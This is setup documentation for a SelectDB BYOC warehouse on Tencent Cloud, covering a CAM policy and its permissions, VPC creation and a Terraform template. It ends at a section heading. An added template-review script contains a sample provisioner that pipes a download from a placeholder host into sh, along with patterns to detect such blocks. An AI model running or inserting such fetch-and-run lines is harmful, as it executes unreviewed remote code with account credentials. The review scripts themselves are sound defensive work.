Tencent Cloud Prerequisites
This document describes the Tencent Cloud operations involved in creating a BYOC warehouse: creating a CAM user and granting it permissions, creating a Virtual Private Cloud (VPC) and subnet, and understanding resource orchestration.
Prepare a CAM user and grant permissions
Before creating a BYOC warehouse, you need a Tencent Cloud CAM user that already holds the required permissions.
Send this document to your Tencent Cloud administrator and ask them to create and authorize the CAM user as described here.
The administrator opens the Tencent Cloud Cloud Access Management (CAM) console and performs the following steps:
Create a permission policy
Creating a SelectDB Cloud BYOC warehouse runs a Terraform template in CloudShell. The template creates or operates on CVM, VPC, COS and other cloud resources, so the user running it needs the set of CAM permissions below.
Click Policies in the left navigation to open the policy management page, click Create Custom Policy, and choose Create by Policy Syntax.
Select the blank template and click Next.
Enter a policy name, clear the text box, and paste the policy below. The individual permissions are explained in the section Permissions required by the Terraform template further down. Before granting it, be clear about what this policy amounts to: the CAM statement allows actions such as cam:AddUser, cam:CreatePolicy, cam:AttachUserPolicy and cam:CreateApiKey on resource "*", which lets the holder grant any permission to any principal in the account, so the user is effectively administrator-equivalent. Treat its credentials as administrator credentials: enable MFA, use the user only for the BYOC bootstrap, and review whether the policy can be detached afterwards. Also note that the COS statement is scoped to ap-beijing (qcs::cos:ap-beijing::*) and covers every bucket in that region, and that a few actions appear twice (for example vpc:ModifyVpcEndPointAttribute and cam:ListAccessKeys); CAM accepts duplicates, but review the list rather than pasting it blindly.
{
"statement": [
{
"action": [
"cvm:DescribeInstances",
"cvm:DescribeInstanceAttributes",
"cvm:InquiryPriceRunInstances",
"cvm:RunInstances",
"cvm:StartInstances",
"cvm:StopInstances",
"cvm:PurgeInstances",
"cvm:RebootInstances",
"cvm:TerminateInstances",
"cvm:RenewInstances",
"cvm:ViewModifyInstancesAttribute",
"cvm:ModifyInstancesAttribute",
"cvm:ModifyInstancesChargeType",
"cvm:ResetInstancesType",
"cvm:DescribeInstancesCbsNum",
"cvm:CreateCbsStorages",
"cvm:AttachCbsStorages",
"cvm:DetachCbsStorages",
"cvm:ResizeCbsStorage",
"cvm:ModifyCbsStorageAttributes",
"cvm:DescribeDisks",
"cvm:CreateDisks",
"cvm:AttachDisks",
"cvm:DetachDisks",
"cvm:RenewDisk",
"cvm:ResizeDisk",
"cvm:ModifyDiskAttributes",
"cvm:DescribeImages",
"cvm:DescribeSecurityGroups",
"cvm:DescribeSecurityGroupPolicys",
"cvm:CreateSecurityGroup",
"cvm:CreateSecurityGroupPolicy",
"cvm:ModifySecurityGroupAttributes",
"cvm:ModifySingleSecurityGroupPolicy",
"cvm:ModifySecurityGroupPolicys",
"cvm:AssociateSecurityGroups",
"cvm:DisassociateSecurityGroups",
"cvm:DeleteSecurityGroup",
"cvm:DeleteSecurityGroupPolicy",
"cvm:DescribeSecurityGroupAssociateInstances",
"cvm:DescribeKeyPairs",
"cvm:CreateKeyPair",
"cvm:AssociateInstancesKeyPairs",
"cvm:DisassociateInstancesKeyPairs",
"cvm:DeleteKeyPairs",
"vpc:DescribeVpcEx",
"vpc:DescribeSubnet",
"vpc:DescribeSubnetEx",
"vpc:ModifyVpcEndPointAttribute",
"vpc:DescribeVpcEndPoint",
"vpc:DescribeVpcEndPointService",
"vpc:DescribeVpcEndPointServiceWhiteList",
"vpc:CheckVpcEndPointServiceExist",
"vpc:CreateVpcEndPoint",
"vpc:DeleteVpcEndPoint",
"vpc:ModifyVpcEndPointAttribute",
"vpc:DisassociateVpcEndPointSecurityGroups",
"vpc:DescribeNetworkInterfaces",
"vpc:DescribeRouteTable",
"vpc:DescribeVpcLimits",
"clb:DescribeLoadBalancers",
"clb:DescribeLoadBalancersDetail",
"clb:InquiryPriceCreateLoadBalancer",
"clb:InquiryPriceRefundLoadBalancer",
"clb:InquiryPriceRenewLoadBalancer",
"clb:CreateLoadBalancer",
"clb:DeleteLoadBalancer",
"clb:DeleteLoadBalancers",
"clb:DescribeListeners",
"clb:DescribeLBListeners",
"clb:DescribeLoadBalancerListeners",
"clb:CreateListener",
"clb:CreateLoadBalancerListeners",
"clb:SetLoadBalancerStartStatus",
"clb:DeleteListener",
"clb:DeleteLoadBalancerListeners",
"clb:DescribeTargets",
"clb:DescribeTargetGroups",
"clb:DescribeTargetGroupList",
"clb:DescribeTargetGroupInstances",
"clb:CreateTargetGroup",
"clb:ModifyTargetGroupAttribute",
"clb:DeleteTargetGroups",
"clb:RegisterTargets",
"clb:DeregisterTargets",
"clb:BatchRegisterTargets",
"clb:BatchDeregisterTargets",
"clb:RegisterTargetGroupInstances",
"clb:AssociateTargetGroups",
"clb:DisassociateTargetGroups",
"clb:RegisterInstancesWithLoadBalancer",
"clb:DeregisterTargetGroupInstances",
"clb:DeregisterInstancesFromLoadBalancer",
"clb:CreateRule",
"clb:CreateListenerRules",
"clb:ModifyRule",
"clb:DeleteRule",
"clb:SetSecurityGroups",
"clb:SetSecurityGroupForLoadbalancers",
"clb:SetLoadBalancerSecurityGroups"
],
"effect": "allow",
"resource": [
"*"
]
},
{
"action": [
"tat:RunCommand",
"tat:DescribeInvocations",
"tat:DescribeInvocationTasks",
"tag:DescribeResourceTagsByResourceIds",
"tag:TagResources",
"tag:UnTagResources"
],
"effect": "allow",
"resource": [
"*"
]
},
{
"action": [
"finance:*"
],
"effect": "allow",
"resource": [
"qcs::cvm:::*",
"qcs::clb:::*"
]
},
{
"action": [
"cos:*"
],
"effect": "allow",
"resource": [
"qcs::cos:ap-beijing::*"
]
},
{
"action": [
"cam:GetPolicy",
"cam:GetPolicyVersion",
"cam:ListPolicyVersions",
"cam:ListAccessKeys",
"cam:GetUserPermissionBoundary",
"cam:ListUserTags",
"cam:QueryApiKey",
"cam:CheckUserPolicyAttachment",
"cam:CreatePolicy",
"cam:DeletePolicy",
"cam:UpdatePolicy",
"cam:GetAccountSummary",
"cam:DescribeSubAccounts",
"cam:ListSubAccounts",
"cam:GetUser",
"cam:GetUserAppId",
"cam:ListUsers",
"cam:GetAllMaskedSubUser",
"cam:GetUserPermissionBoundary",
"cam:AddUser",
"cam:AttachUserPolicy",
"cam:ListAttachedUserPolicies",
"cam:ListAttachedUserAllPolicies",
"cam:CheckUserPolicyAttachment",
"cam:DetachUserPolicy",
"cam:DeleteUser",
"cam:UpdateUser",
"cam:ListUserTags",
"cam:DescribeRoleList",
"cam:GetRole",
"cam:CreateRole",
"cam:GetRolePermissionBoundary",
"cam:GetServiceLinkedRoleDeletionStatus",
"cam:CreateServiceLinkedRole",
"cam:PutRolePermissionsBoundary",
"cam:AttachRolePolicy",
"cam:ListAttachedRolePolicies",
"cam:DeleteRole",
"cam:DeleteRolePermissionsBoundary",
"cam:DeleteServiceLinkedRole",
"cam:DetachRolePolicy",
"cam:LogoutRoleSessions",
"cam:PassRole",
"cam:ListRoleTags",
"cam:TagRole",
"cam:UntagRole",
"cam:UpdateRoleConsoleLogin",
"cam:UpdateRoleDescription",
"cam:UpdateAssumeRolePolicy",
"cam:ListAccessKeys",
"cam:QueryApiKey",
"cam:DeleteApiKey",
"cam:CreateApiKey",
"cam:CreateAccessKey",
"cam:DeleteAccessKey",
"cam:UpdateAccessKey"
],
"effect": "allow",
"resource": [
"*"
]
}
],
"version": "2.0"
}
Click Done to finish creating the policy.
Create a CAM user and grant the policy
Note: if a CAM user already exists, skip the creation step and grant the policy to the existing user.
Click Users in the left navigation to open the user management page, click Create User > Quick Create, enter the user details, and click Create User.
Back in the user list, click Authorize next to the user, select the policy created in the previous step, and click OK.
Create a CAM user group and grant the policy (optional)
Note: if a CAM user group already exists, skip the creation step and grant the policy to the existing group.
If several people in your organization use SelectDB Cloud, you can create a CAM user group, add them to it, and grant the policy to the group once instead of to each user.
Click User Groups in the left navigation to open the user group management page, click Create User Group, enter a group name, click Next, select the policy created above, and click Done.
Prepare a VPC and subnet
Note:
- If you already have a VPC in a supported region and want to deploy the BYOC warehouse into it, skip the VPC and subnet creation steps below.
- Currently supported regions and subnet availability zones:
  - North China (Beijing): Beijing Zone 3, Beijing Zone 6, Beijing Zone 7
  - South China (Guangzhou): Guangzhou Zone 6, Guangzhou Zone 7
Before creating a BYOC warehouse, use the CAM user prepared above to create the VPC and subnet as follows.
Open the Tencent Cloud Virtual Private Cloud (VPC) console, switch to the region where you want the BYOC warehouse, and click Create to open the VPC creation page.
Enter a name, choose the IPv4 CIDR, enter the subnet name, subnet IPv4 CIDR and subnet availability zone (one of the zones listed above), and click OK. Choose a CIDR that does not overlap with networks you may later need to peer or connect to this VPC, since changing it afterwards is disruptive.
Understand resource orchestration
When you create a BYOC warehouse, the cloud provider's resource orchestration service first deploys an Agent automatically and establishes a private connection between the Agent and the SelectDB Cloud platform; the Agent then deploys and manages the BYOC warehouse.
About the Terraform template
The Terraform orchestration template SelectDB provides runs under your Tencent Cloud account. Its code is visible and auditable, and it does not operate on your data or on other environments in your VPC. You can download the template from the following link; since it is fetched from a public object-storage URL with no version in its name, read it and keep a copy of the exact file you ran before applying it:
https://online-bj-1313869400.cos.ap-beijing.myqcloud.com/public/txcloud-ap-beijing-byoc-cf.tf
When you run this template in Tencent Cloud CloudShell, it creates and deploys the Agent. The Agent then establishes a private connection to SelectDB Cloud and completes the warehouse initialization.
Once the orchestration script has finished, open the warehouse from the SelectDB Cloud console and create compute clusters for data analysis as you would with an ordinary warehouse.
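The template is downloaded from a public COS URL and then applied with broad permissions, so it pays to check what it will create before `terraform apply`. The following is an added example, not SelectDB's template or tooling: a Python script that pins the downloaded file by SHA-256, inventories its resource and data blocks, checks the provider region, flags resource types outside the services the CAM policy on this page covers, and flags blocks that run commands in your CloudShell session or pull in remote content. The embedded template is constructed for the example; only the names SelectDBBucket, SelectDBRole and SelectDBUserAccount come from the policy interpolations shown on this page, and the EXPECTED_PREFIXES list is an assumption about which Tencent Cloud provider resource types correspond to those services.

```python
"""Pre-apply review of a downloaded Terraform template (added example).

Not the SelectDB template or tooling. Pins the reviewed file by hash, lists
every resource/data block, checks the provider region, and flags blocks that
deserve a manual read before `terraform apply` in CloudShell.
"""
import hashlib
import json
import re
from collections import Counter

# Resource-type prefixes matching the services the CAM policy on this page
# grants (CVM/CBS/security groups/key pairs, VPC endpoints, CLB, COS, CAM, TAT).
# Assumption for the example; not taken from the real template.
EXPECTED_PREFIXES = (
    "tencentcloud_instance", "tencentcloud_cbs_", "tencentcloud_security_group",
    "tencentcloud_key_pair", "tencentcloud_vpc_end_point", "tencentcloud_clb_",
    "tencentcloud_cos_bucket", "tencentcloud_cam_", "tencentcloud_tat_",
)

# Blocks that execute commands with the CloudShell user's credentials or load
# content from outside the file under review.
RISKY_PATTERNS = {
    "local-exec provisioner": re.compile(r'provisioner\s+"local-exec"'),
    "remote-exec provisioner": re.compile(r'provisioner\s+"remote-exec"'),
    "external data source": re.compile(r'data\s+"(external|http)"'),
    "module from URL": re.compile(r'source\s*=\s*"(https?://|git::)'),
}

BLOCK_RE = re.compile(r'^\s*(resource|data)\s+"([^"]+)"\s+"([^"]+)"', re.M)
REGION_RE = re.compile(r'^\s*region\s*=\s*"([^"]+)"', re.M)

# Constructed sample template (not the real one). The null_resource block is
# invented so the review has something to flag.
SAMPLE_TF = '''
provider "tencentcloud" {
  region = "ap-beijing"
}
data "tencentcloud_user_info" "SelectDBUserAccount" {}
resource "tencentcloud_cos_bucket" "SelectDBBucket" {
  bucket = "selectdb-byoc-${data.tencentcloud_user_info.SelectDBUserAccount.app_id}"
}
resource "tencentcloud_cam_role" "SelectDBRole" {
  name     = "SelectDBRole"
  document = "{}"
}
resource "tencentcloud_instance" "SelectDBAgent" {
  instance_name = "selectdb-agent"
  image_id      = "img-example"
}
resource "null_resource" "bootstrap" {
  provisioner "local-exec" {
    command = "curl -s https://example.invalid/bootstrap.sh | sh"
  }
}
'''


def sha256_hex(text: str) -> str:
    """Digest of the reviewed file; record it and compare on every later download."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def verify_pin(text: str, pinned_digest: str) -> bool:
    """True only if the file is byte-for-byte the one that was reviewed."""
    return sha256_hex(text) == pinned_digest


def inventory(hcl: str) -> dict:
    """Count resource and data blocks by type and collect provider regions."""
    resources, data_sources = Counter(), Counter()
    for kind, rtype, _name in BLOCK_RE.findall(hcl):
        (resources if kind == "resource" else data_sources)[rtype] += 1
    return {
        "resources": dict(resources),
        "data_sources": dict(data_sources),
        "regions": sorted(set(REGION_RE.findall(hcl))),
    }


def unexpected_resources(hcl: str) -> list:
    """Resource types outside the services the CAM policy was written for."""
    return sorted(t for t in inventory(hcl)["resources"]
                  if not t.startswith(EXPECTED_PREFIXES))


def risky_blocks(hcl: str) -> list:
    """Labels of the RISKY_PATTERNS present in the template."""
    return [label for label, rx in RISKY_PATTERNS.items() if rx.search(hcl)]


def review(hcl: str, target_region: str) -> dict:
    """Everything a reviewer wants on one screen before running apply."""
    inv = inventory(hcl)
    return {
        "sha256": sha256_hex(hcl),
        "inventory": inv,
        "region_ok": inv["regions"] == [target_region],
        "unexpected": unexpected_resources(hcl),
        "risky": risky_blocks(hcl),
    }


if __name__ == "__main__":
    print(json.dumps(review(SAMPLE_TF, "ap-beijing"), indent=2))
```

Against the real file, call `review(open("txcloud-ap-beijing-byoc-cf.tf").read(), "ap-beijing")` after downloading, store the printed digest, and compare with `verify_pin` on the next download so a silently changed template is noticed. A `null_resource` with a `local-exec` provisioner is not necessarily malicious, but it runs in your CloudShell session with your CAM user's credentials, so read it before applying.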
Permissions required by the Terraform template
Running the Terraform template in CloudShell under your cloud account creates or operates on CVM, VPC, COS and other cloud resources and therefore needs a set of CAM permissions. Before running it, make sure the user executing the template holds these permissions; otherwise the run may fail part-way, leaving some resources created and others not.
Note: the Terraform template runs entirely within your cloud account, and every resource it creates belongs to that account. SelectDB does not obtain your cloud account credentials and cannot exercise that account's CAM permissions.
{
"statement": [
{
"action": [
"cvm:DescribeInstances",
"cvm:DescribeInstanceAttributes",
"cvm:InquiryPriceRunInstances",
"cvm:RunInstances",
"cvm:StartInstances",
"cvm:StopInstances",
"cvm:PurgeInstances",
"cvm:RebootInstances",
"cvm:TerminateInstances",
"cvm:RenewInstances",
"cvm:ViewModifyInstancesAttribute",
"cvm:ModifyInstancesAttribute",
"cvm:ModifyInstancesChargeType",
"cvm:ResetInstancesType",
"cvm:DescribeInstancesCbsNum",
"cvm:CreateCbsStorages",
"cvm:AttachCbsStorages",
"cvm:DetachCbsStorages",
"cvm:ResizeCbsStorage",
"cvm:ModifyCbsStorageAttributes",
"cvm:DescribeDisks",
"cvm:CreateDisks",
"cvm:AttachDisks",
"cvm:DetachDisks",
"cvm:RenewDisk",
"cvm:ResizeDisk",
"cvm:ModifyDiskAttributes",
"cvm:DescribeImages",
"cvm:DescribeSecurityGroups",
"cvm:DescribeSecurityGroupPolicys",
"cvm:CreateSecurityGroup",
"cvm:CreateSecurityGroupPolicy",
"cvm:ModifySecurityGroupAttributes",
"cvm:ModifySingleSecurityGroupPolicy",
"cvm:ModifySecurityGroupPolicys",
"cvm:AssociateSecurityGroups",
"cvm:DisassociateSecurityGroups",
"cvm:DeleteSecurityGroup",
"cvm:DeleteSecurityGroupPolicy",
"cvm:DescribeSecurityGroupAssociateInstances",
"cvm:DescribeKeyPairs",
"cvm:CreateKeyPair",
"cvm:AssociateInstancesKeyPairs",
"cvm:DisassociateInstancesKeyPairs",
"cvm:DeleteKeyPairs",
"vpc:DescribeVpcEx",
"vpc:DescribeSubnet",
"vpc:DescribeSubnetEx",
"vpc:ModifyVpcEndPointAttribute",
"vpc:DescribeVpcEndPoint",
"vpc:DescribeVpcEndPointService",
"vpc:DescribeVpcEndPointServiceWhiteList",
"vpc:CheckVpcEndPointServiceExist",
"vpc:CreateVpcEndPoint",
"vpc:DeleteVpcEndPoint",
"vpc:ModifyVpcEndPointAttribute",
"vpc:DisassociateVpcEndPointSecurityGroups",
"vpc:DescribeNetworkInterfaces",
"vpc:DescribeRouteTable",
"vpc:DescribeVpcLimits",
"clb:DescribeLoadBalancers",
"clb:DescribeLoadBalancersDetail",
"clb:InquiryPriceCreateLoadBalancer",
"clb:InquiryPriceRefundLoadBalancer",
"clb:InquiryPriceRenewLoadBalancer",
"clb:CreateLoadBalancer",
"clb:DeleteLoadBalancer",
"clb:DeleteLoadBalancers",
"clb:DescribeListeners",
"clb:DescribeLBListeners",
"clb:DescribeLoadBalancerListeners",
"clb:CreateListener",
"clb:CreateLoadBalancerListeners",
"clb:SetLoadBalancerStartStatus",
"clb:DeleteListener",
"clb:DeleteLoadBalancerListeners",
"clb:DescribeTargets",
"clb:DescribeTargetGroups",
"clb:DescribeTargetGroupList",
"clb:DescribeTargetGroupInstances",
"clb:CreateTargetGroup",
"clb:ModifyTargetGroupAttribute",
"clb:DeleteTargetGroups",
"clb:RegisterTargets",
"clb:DeregisterTargets",
"clb:BatchRegisterTargets",
"clb:BatchDeregisterTargets",
"clb:RegisterTargetGroupInstances",
"clb:AssociateTargetGroups",
"clb:DisassociateTargetGroups",
"clb:RegisterInstancesWithLoadBalancer",
"clb:DeregisterTargetGroupInstances",
"clb:DeregisterInstancesFromLoadBalancer",
"clb:CreateRule",
"clb:CreateListenerRules",
"clb:ModifyRule",
"clb:DeleteRule",
"clb:SetSecurityGroups",
"clb:SetSecurityGroupForLoadbalancers",
"clb:SetLoadBalancerSecurityGroups"
],
"effect": "allow",
"resource": [
"*"
]
},
{
"action": [
"tat:RunCommand",
"tat:DescribeInvocations",
"tat:DescribeInvocationTasks",
"tag:DescribeResourceTagsByResourceIds",
"tag:TagResources",
"tag:UnTagResources"
],
"effect": "allow",
"resource": [
"*"
]
},
{
"action": [
"finance:*"
],
"effect": "allow",
"resource": [
"qcs::cvm:::*",
"qcs::clb:::*"
]
},
{
"action": [
"cos:*"
],
"effect": "allow",
"resource": [
"qcs::cos:ap-beijing::*"
]
},
{
"action": [
"cam:GetPolicy",
"cam:GetPolicyVersion",
"cam:ListPolicyVersions",
"cam:ListAccessKeys",
"cam:GetUserPermissionBoundary",
"cam:ListUserTags",
"cam:QueryApiKey",
"cam:CheckUserPolicyAttachment",
"cam:CreatePolicy",
"cam:DeletePolicy",
"cam:UpdatePolicy",
"cam:GetAccountSummary",
"cam:DescribeSubAccounts",
"cam:ListSubAccounts",
"cam:GetUser",
"cam:GetUserAppId",
"cam:ListUsers",
"cam:GetAllMaskedSubUser",
"cam:GetUserPermissionBoundary",
"cam:AddUser",
"cam:AttachUserPolicy",
"cam:ListAttachedUserPolicies",
"cam:ListAttachedUserAllPolicies",
"cam:CheckUserPolicyAttachment",
"cam:DetachUserPolicy",
"cam:DeleteUser",
"cam:UpdateUser",
"cam:ListUserTags",
"cam:DescribeRoleList",
"cam:GetRole",
"cam:CreateRole",
"cam:GetRolePermissionBoundary",
"cam:GetServiceLinkedRoleDeletionStatus",
"cam:CreateServiceLinkedRole",
"cam:PutRolePermissionsBoundary",
"cam:AttachRolePolicy",
"cam:ListAttachedRolePolicies",
"cam:DeleteRole",
"cam:DeleteRolePermissionsBoundary",
"cam:DeleteServiceLinkedRole",
"cam:DetachRolePolicy",
"cam:LogoutRoleSessions",
"cam:PassRole",
"cam:ListRoleTags",
"cam:TagRole",
"cam:UntagRole",
"cam:UpdateRoleConsoleLogin",
"cam:UpdateRoleDescription",
"cam:UpdateAssumeRolePolicy",
"cam:ListAccessKeys",
"cam:QueryApiKey",
"cam:DeleteApiKey",
"cam:CreateApiKey",
"cam:CreateAccessKey",
"cam:DeleteAccessKey",
"cam:UpdateAccessKey"
],
"effect": "allow",
"resource": [
"*"
]
}
],
"version": "2.0"
}
The permissions break down as follows:
- Cloud Virtual Machine (CVM) permissions:
  - Manage CVM instances and CBS disks:
    "cvm:DescribeInstances", "cvm:DescribeInstanceAttributes", "cvm:InquiryPriceRunInstances", "cvm:RunInstances", "cvm:StartInstances", "cvm:StopInstances", "cvm:PurgeInstances", "cvm:RebootInstances", "cvm:TerminateInstances", "cvm:RenewInstances", "cvm:ViewModifyInstancesAttribute", "cvm:ModifyInstancesAttribute", "cvm:ModifyInstancesChargeType", "cvm:ResetInstancesType", "cvm:DescribeInstancesCbsNum", "cvm:CreateCbsStorages", "cvm:AttachCbsStorages", "cvm:DetachCbsStorages", "cvm:ResizeCbsStorage", "cvm:ModifyCbsStorageAttributes", "cvm:DescribeDisks", "cvm:CreateDisks", "cvm:AttachDisks", "cvm:DetachDisks", "cvm:RenewDisk", "cvm:ResizeDisk", "cvm:ModifyDiskAttributes", "cvm:DescribeImages",
  - Manage CVM security groups:
    "cvm:DescribeSecurityGroups", "cvm:DescribeSecurityGroupPolicys", "cvm:CreateSecurityGroup", "cvm:CreateSecurityGroupPolicy", "cvm:ModifySecurityGroupAttributes", "cvm:ModifySingleSecurityGroupPolicy", "cvm:ModifySecurityGroupPolicys", "cvm:AssociateSecurityGroups", "cvm:DisassociateSecurityGroups", "cvm:DeleteSecurityGroup", "cvm:DeleteSecurityGroupPolicy", "cvm:DescribeSecurityGroupAssociateInstances",
  - Manage CVM SSH key pairs:
    "cvm:DescribeKeyPairs", "cvm:CreateKeyPair", "cvm:AssociateInstancesKeyPairs", "cvm:DisassociateInstancesKeyPairs", "cvm:DeleteKeyPairs",
  - Run TencentCloud Automation Tools (TAT) commands on CVM and manage tags:
    "tat:RunCommand", "tat:DescribeInvocations", "tat:DescribeInvocationTasks", "tag:DescribeResourceTagsByResourceIds", "tag:TagResources", "tag:UnTagResources"
- Virtual Private Cloud (VPC), PrivateLink and CLB permissions:
  - Read VPC resource information:
    "vpc:DescribeVpcEx", "vpc:DescribeSubnet", "vpc:DescribeSubnetEx", "vpc:DescribeNetworkInterfaces", "vpc:DescribeRouteTable", "vpc:DescribeVpcLimits",
  - Manage VPC endpoint resources:
    "vpc:ModifyVpcEndPointAttribute", "vpc:DescribeVpcEndPoint", "vpc:DescribeVpcEndPointService", "vpc:DescribeVpcEndPointServiceWhiteList", "vpc:CheckVpcEndPointServiceExist", "vpc:CreateVpcEndPoint", "vpc:DeleteVpcEndPoint", "vpc:ModifyVpcEndPointAttribute", "vpc:DisassociateVpcEndPointSecurityGroups",
  - Manage Cloud Load Balancer (CLB) resources:
    "clb:DescribeLoadBalancers", "clb:DescribeLoadBalancersDetail", "clb:InquiryPriceCreateLoadBalancer", "clb:InquiryPriceRefundLoadBalancer", "clb:InquiryPriceRenewLoadBalancer", "clb:CreateLoadBalancer", "clb:DeleteLoadBalancer", "clb:DeleteLoadBalancers", "clb:DescribeListeners", "clb:DescribeLBListeners", "clb:DescribeLoadBalancerListeners", "clb:CreateListener", "clb:CreateLoadBalancerListeners", "clb:SetLoadBalancerStartStatus", "clb:DeleteListener", "clb:DeleteLoadBalancerListeners", "clb:DescribeTargets", "clb:DescribeTargetGroups", "clb:DescribeTargetGroupList", "clb:DescribeTargetGroupInstances", "clb:CreateTargetGroup", "clb:ModifyTargetGroupAttribute", "clb:DeleteTargetGroups", "clb:RegisterTargets", "clb:DeregisterTargets", "clb:BatchRegisterTargets", "clb:BatchDeregisterTargets", "clb:RegisterTargetGroupInstances", "clb:AssociateTargetGroups", "clb:DisassociateTargetGroups", "clb:RegisterInstancesWithLoadBalancer", "clb:DeregisterTargetGroupInstances", "clb:DeregisterInstancesFromLoadBalancer", "clb:CreateRule", "clb:CreateListenerRules", "clb:ModifyRule", "clb:DeleteRule", "clb:SetSecurityGroups", "clb:SetSecurityGroupForLoadbalancers", "clb:SetLoadBalancerSecurityGroups"
- Finance permissions:
  - Allow purchasing CVM and CLB resources:
    { "action": [ "finance:*" ], "effect": "allow", "resource": [ "qcs::cvm:::*", "qcs::clb:::*" ] },
- Cloud Object Storage (COS) permissions:
  - Manage COS buckets and read and write their contents. Note that the operator policy above grants cos:* on every bucket in ap-beijing (qcs::cos:ap-beijing::*); the statement below, with its Terraform interpolations, is the bucket-scoped form that the template applies to the sub-user it creates:
    { "action": [ "cos:*" ], "effect": "allow", "resource": [ "qcs::cos:ap-beijing:uid/${local.appID}:${tencentcloud_cos_bucket.SelectDBBucket.id}", "qcs::cos:ap-beijing:uid/${local.appID}:${tencentcloud_cos_bucket.SelectDBBucket.id}/*" ] },
- Cloud Access Management (CAM) permissions:
  - Manage policies:
    "cam:GetPolicy", "cam:GetPolicyVersion", "cam:ListPolicyVersions", "cam:GetUserPermissionBoundary", "cam:ListUserTags", "cam:QueryApiKey", "cam:CheckUserPolicyAttachment", "cam:CreatePolicy", "cam:DeletePolicy", "cam:UpdatePolicy",
  - Manage sub-users and read account information:
    "cam:GetAccountSummary", "cam:DescribeSubAccounts", "cam:ListSubAccounts", "cam:GetUser", "cam:GetUserAppId", "cam:ListUsers", "cam:GetAllMaskedSubUser", "cam:GetUserPermissionBoundary", "cam:AddUser", "cam:AttachUserPolicy", "cam:ListAttachedUserPolicies", "cam:ListAttachedUserAllPolicies", "cam:CheckUserPolicyAttachment", "cam:DetachUserPolicy", "cam:DeleteUser", "cam:UpdateUser", "cam:ListUserTags",
  - Manage CAM access keys:
    "cam:ListAccessKeys", "cam:QueryApiKey", "cam:DeleteApiKey", "cam:CreateApiKey", "cam:CreateAccessKey", "cam:DeleteAccessKey", "cam:UpdateAccessKey"
  - Manage roles:
    "cam:DescribeRoleList", "cam:GetRole", "cam:CreateRole", "cam:GetRolePermissionBoundary", "cam:GetServiceLinkedRoleDeletionStatus", "cam:CreateServiceLinkedRole", "cam:PutRolePermissionsBoundary", "cam:AttachRolePolicy", "cam:ListAttachedRolePolicies", "cam:DeleteRole", "cam:DeleteRolePermissionsBoundary", "cam:DeleteServiceLinkedRole", "cam:DetachRolePolicy", "cam:LogoutRoleSessions", "cam:PassRole", "cam:ListRoleTags", "cam:TagRole", "cam:UntagRole", "cam:UpdateRoleConsoleLogin", "cam:UpdateRoleDescription", "cam:UpdateAssumeRolePolicy",
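As an added example (not SelectDB's or Tencent Cloud's code), the following Python script audits a CAM policy document in the format shown above for the points a reviewer should check before attaching it: duplicated actions, wildcard actions such as cos:* and finance:*, escalation-capable CAM actions granted on resource "*", and regions hard-coded in qcs:: resource strings. SAMPLE_POLICY is a constructed, trimmed copy of the policy on this page that keeps its duplicated entries; the ESCALATION_ACTIONS set is my own selection of the actions that matter most, not a Tencent Cloud list.

```python
"""Audit a Tencent Cloud CAM policy document for least-privilege problems.

Added example: not part of the SelectDB documentation or the Terraform
template. Reads a CAM policy in the JSON shape shown on this page and reports
duplicate actions, wildcard actions, escalation-capable actions granted on
resource "*", and regions hard-coded in qcs:: resource strings.
"""
import json
from collections import Counter

# CAM actions that, when allowed on resource "*", let the holder create new
# principals or attach arbitrary policies, which is account-admin equivalent.
# This selection is the example author's assumption, not a Tencent Cloud list.
ESCALATION_ACTIONS = {
    "cam:AddUser", "cam:AttachUserPolicy", "cam:AttachRolePolicy",
    "cam:CreatePolicy", "cam:UpdatePolicy", "cam:UpdateAssumeRolePolicy",
    "cam:CreateApiKey", "cam:CreateAccessKey", "cam:PassRole",
}

# Constructed sample: a trimmed copy of the operator policy on this page,
# keeping the duplicated entries so the audit has something to find.
SAMPLE_POLICY = json.loads("""
{
  "version": "2.0",
  "statement": [
    {"effect": "allow", "resource": ["*"],
     "action": ["vpc:DescribeVpcEx", "vpc:ModifyVpcEndPointAttribute",
                "vpc:CreateVpcEndPoint", "vpc:ModifyVpcEndPointAttribute"]},
    {"effect": "allow", "resource": ["*"],
     "action": ["cam:ListAccessKeys", "cam:CreatePolicy", "cam:AddUser",
                "cam:AttachUserPolicy", "cam:CreateApiKey", "cam:ListAccessKeys"]},
    {"effect": "allow", "resource": ["qcs::cvm:::*", "qcs::clb:::*"],
     "action": ["finance:*"]},
    {"effect": "allow", "resource": ["qcs::cos:ap-beijing::*"],
     "action": ["cos:*"]}
  ]
}
""")


def _as_list(value):
    """CAM accepts a string or a list for action/resource; normalise to a list."""
    return value if isinstance(value, list) else [value]


def region_of(resource: str) -> str:
    """Region field of a qcs::service:region:account:path string.
    Returns "" when the field is empty or the resource is a bare "*"."""
    parts = resource.split(":")
    if len(parts) < 4 or parts[0] != "qcs":
        return ""
    return parts[3]


def audit_policy(policy: dict) -> dict:
    """Collect findings over every allow statement in the policy."""
    findings = {"duplicates": [], "wildcard_actions": [], "escalation": [], "regions": []}
    for statement in policy["statement"]:
        if statement.get("effect") != "allow":
            continue
        actions = _as_list(statement["action"])
        resources = _as_list(statement["resource"])
        # Duplicates are harmless to CAM but show the list was concatenated,
        # not reviewed.
        findings["duplicates"] += [a for a, n in Counter(actions).items() if n > 1]
        findings["wildcard_actions"] += [a for a in actions if a.endswith("*")]
        # Escalation actions only matter when the resource is unconstrained.
        if "*" in resources:
            findings["escalation"] += sorted(ESCALATION_ACTIONS & set(actions))
        for region in map(region_of, resources):
            if region and region not in findings["regions"]:
                findings["regions"].append(region)
    return findings


def dedupe_policy(policy: dict) -> dict:
    """Copy of the policy with repeated actions removed; first occurrence is
    kept so the statement order stays reviewable and nothing granted changes."""
    cleaned = json.loads(json.dumps(policy))
    for statement in cleaned["statement"]:
        statement["action"] = list(dict.fromkeys(_as_list(statement["action"])))
    return cleaned


def region_mismatch(policy: dict, target_region: str) -> list:
    """Regions hard-coded in the policy that differ from the deployment region.
    A policy pinned to ap-beijing will not cover a Guangzhou deployment."""
    return [r for r in audit_policy(policy)["regions"] if r != target_region]


if __name__ == "__main__":
    print(json.dumps(audit_policy(SAMPLE_POLICY), indent=2))
    print("regions to revisit for ap-guangzhou:",
          region_mismatch(SAMPLE_POLICY, "ap-guangzhou"))
```

Run `audit_policy(json.load(open("policy.json")))` on the full policy above before attaching it; `region_mismatch(policy, "ap-guangzhou")` is the check to run before a Guangzhou deployment, since the COS statement is pinned to ap-beijing. `dedupe_policy` removes the repeated actions without changing what is granted.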
Permissions of the sub-user created by the Terraform template
